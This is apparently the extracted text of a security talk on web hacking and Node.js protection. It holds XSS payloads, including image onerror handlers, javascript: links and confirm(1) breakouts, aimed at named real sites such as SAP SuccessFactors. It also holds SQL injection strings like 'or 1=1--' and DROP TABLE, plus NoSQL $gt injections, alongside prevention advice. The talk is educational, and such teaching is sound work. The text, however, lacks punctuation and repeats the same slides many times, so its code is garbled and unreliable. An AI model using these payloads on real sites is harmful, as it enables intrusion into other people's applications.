(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
decodeURI decodes encoded URI
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=xxxxxxxxyyyyyltimg
Possibilities
bull -confirm(1)-
bull -confirm`1`-
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=-confirm(1)-lsquo
var topic = decodeURI()confirm(1)()
var topic = decodeURI()confirm(1))
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
